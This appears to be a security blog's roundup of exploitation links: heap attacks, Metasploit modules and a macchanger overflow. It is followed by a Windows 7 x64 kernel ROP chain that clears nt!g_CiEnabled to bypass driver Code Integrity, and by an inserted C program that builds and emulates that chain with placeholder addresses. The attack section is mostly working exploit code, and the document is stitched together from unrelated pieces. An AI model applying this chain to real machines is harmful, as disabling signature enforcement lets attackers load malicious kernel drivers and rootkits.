Hackers Target Video Game Makers

Here’s a great article about how some hackers are targeting video game makers to give the game away for free and to outscore their opponents. Good read.


x86 Exploitation 101: this is the first witchy house

So, history goes on with Phantasmal Phantasmagoria publishing a groundbreaking article in 2005 (right after the one-line-of-code unlink fix) called Malloc Maleficarum, proposing five new ways of attacking the glibc heap implementation used on Linux.


Add new exploits to Metasploit from Exploit-db

Until now you have been using mainstream exploits that are well known but old. They work well, but only against old, unpatched operating systems, not current ones.


GNU macchanger <= 1.6.0 Heap Buffer Overflow

I was poking around the GNU macchanger source code the other day for fun and happened across this little gem. Unfortunately modern heap-corruption protections render it unexploitable (to the best of my knowledge), and even then, you would only be able to gain the privileges of the current user.


Stretching elasticsearch

This week I had to look into elasticsearch. Simply put, it is a search engine with a simple-to-use interface. Interface as in REST API, I mean.


ROP for Windows 7 x64 to bypass Code Integrity from vulnerable DriverEntry

RET instructions are omitted

;; NT Kernel ROP chain to bypass Code Integrity on Windows 7 x64 SP1 from IopLoadDriver
;; ntoskrnl.exe
;; 6.1.7601.18409  
pop           rax                  ; rsp + 10  ; skip this gets replaced
pop           rax                  ; rsp + 20  ; nt!g_CiEnabled
mov byte ptr  [rax], 0             ; rsp + 28  ; nt!g_CiEnabled = 0
pop           rax                  ; rsp + 38  ; align stack     
pop           rax                  ; rsp + 48  ; align stack
xor           eax, eax             ; rsp + 50  ; STATUS_SUCCESS
add           rsp, 240h            ; rsp + 290 ; epilogue
pop           r15
pop           r14
pop           r13
pop           r12
pop           rdi
pop           rsi
pop           rbp
retn                               ; return to IopLoadUnloadDriver
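The stack accounting behind the chain above, as an added example that is not part of the original post: a C program that lays the chain out as qwords in the same slot order as the listing and emulates the three gadget types it uses, checking that g_CiEnabled is cleared, that eax is zero (STATUS_SUCCESS) when the epilogue runs, and that the epilogue's retn lands on the saved return address at rsp+2C8h (50h of chain, plus the 240h the epilogue adds, plus seven 8-byte pops). The gadget addresses, the g_CiEnabled address and the saved return address are placeholder constants (assumed), not values from any ntoskrnl build; a real chain resolves them from the target kernel image.

```c
/* Added example: layout and emulation of the g_CiEnabled ROP chain above.
 * All addresses below are ASSUMED placeholders, not real ntoskrnl values. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum {
    G_POP_RAX_RET       = 0x1001, /* assumed: pop rax ; ret */
    G_MOV_BYTE_RAX_ZERO = 0x1002, /* assumed: mov byte ptr [rax], 0 ; ret */
    G_IOPLOADDRIVER_EPI = 0x1003, /* assumed: xor eax,eax ; add rsp,240h ; pop r15..rbp ; retn */
    ADDR_G_CIENABLED    = 0x2000, /* assumed: nt!g_CiEnabled */
    RET_IOPLOADUNLOAD   = 0x3000, /* assumed: IopLoadDriver's saved return into IopLoadUnloadDriver */
};
#define PAD           0x4141414141414141ULL
#define CHAIN_QWORDS  10
#define STACK_BYTES   0x300
#define SAVED_RET_OFF (0x50 + 0x240 + 7 * 8) /* 0x2C8: where the epilogue's retn reads its target */

typedef struct {
    uint64_t stack[STACK_BYTES / 8]; /* kernel stack, offsets relative to the overwritten return slot */
    uint64_t rax, rsp, pc;
    uint8_t  g_ci_enabled;           /* stands in for nt!g_CiEnabled */
} machine_t;

/* Same slot order as the listing: out[0] is what the overflow leaves in DriverEntry's return slot. */
size_t build_chain(uint64_t out[CHAIN_QWORDS])
{
    size_t n = 0;
    out[n++] = G_POP_RAX_RET;        /* rsp+00  pop rax ; ret                          */
    out[n++] = PAD;                  /* rsp+08  consumed by pop rax                    */
    out[n++] = G_POP_RAX_RET;        /* rsp+10  pop rax ; ret                          */
    out[n++] = ADDR_G_CIENABLED;     /* rsp+18  rax = &nt!g_CiEnabled                  */
    out[n++] = G_MOV_BYTE_RAX_ZERO;  /* rsp+20  mov byte ptr [rax], 0                  */
    out[n++] = G_POP_RAX_RET;        /* rsp+28  align stack                            */
    out[n++] = PAD;                  /* rsp+30                                         */
    out[n++] = G_POP_RAX_RET;        /* rsp+38  align stack                            */
    out[n++] = PAD;                  /* rsp+40                                         */
    out[n++] = G_IOPLOADDRIVER_EPI;  /* rsp+48  xor eax,eax ; add rsp,240h ; pops ; retn */
    return n;
}

static uint64_t pop64(machine_t *m)
{
    uint64_t v = m->stack[m->rsp / 8];
    m->rsp += 8;
    return v;
}

/* Emulated frame: chain at the overwritten return slot, CI enabled, and IopLoadDriver's
 * own saved return address (not touched by the overflow) sitting past its frame. */
void setup_machine(machine_t *m)
{
    uint64_t chain[CHAIN_QWORDS];
    size_t n = build_chain(chain);
    memset(m, 0, sizeof *m);
    m->g_ci_enabled = 1;
    memcpy(m->stack, chain, n * sizeof chain[0]);
    m->stack[SAVED_RET_OFF / 8] = RET_IOPLOADUNLOAD;
}

/* Run from the retn that consumes the overwritten slot. Returns the address the final
 * retn jumps to, or 0 on a fault (write through a wrong rax, or a non-gadget pc). */
uint64_t run_chain(machine_t *m)
{
    m->rsp = 0;
    m->pc = pop64(m);                       /* DriverEntry's retn */
    for (;;) {
        switch (m->pc) {
        case G_POP_RAX_RET:
            m->rax = pop64(m);
            break;
        case G_MOV_BYTE_RAX_ZERO:
            if (m->rax != ADDR_G_CIENABLED) /* only the CI flag is mapped in this model */
                return 0;
            m->g_ci_enabled = 0;
            break;
        case G_IOPLOADDRIVER_EPI:
            m->rax = 0;                     /* xor eax, eax -> STATUS_SUCCESS */
            m->rsp += 0x240;                /* add rsp, 240h */
            for (int i = 0; i < 7; i++)     /* pop r15, r14, r13, r12, rdi, rsi, rbp */
                (void)pop64(m);
            return pop64(m);                /* retn into IopLoadUnloadDriver */
        default:
            return 0;
        }
        m->pc = pop64(m);                   /* the gadget's own ret */
    }
}

/* 1 if the chain clears g_CiEnabled, leaves rax == STATUS_SUCCESS and returns to
 * the saved IopLoadUnloadDriver address; 0 otherwise. */
int chain_disables_ci(void)
{
    machine_t m;
    setup_machine(&m);
    uint64_t target = run_chain(&m);
    return target == RET_IOPLOADUNLOAD && m.g_ci_enabled == 0 && m.rax == 0;
}

/* rsp (relative to the overwritten slot) once the epilogue's retn has executed: 0x2D0. */
uint64_t chain_final_rsp(void)
{
    machine_t m;
    setup_machine(&m);
    run_chain(&m);
    return m.rsp;
}

int main(void)
{
    printf("CI disabled and clean return: %s\n", chain_disables_ci() ? "yes" : "no");
    printf("final rsp: +%llxh\n", (unsigned long long)chain_final_rsp());
    return chain_disables_ci() ? 0 : 1;
}
```

The emulator models only what the listing shows, so the point is the arithmetic rather than the gadgets: because the last gadget is IopLoadDriver's own epilogue, the overflow needs to control just 50h bytes of stack, and the saved return address beyond the 240h frame plus the seven pops is left as the kernel wrote it, which is what lets the chain fall back into IopLoadUnloadDriver with STATUS_SUCCESS instead of crashing.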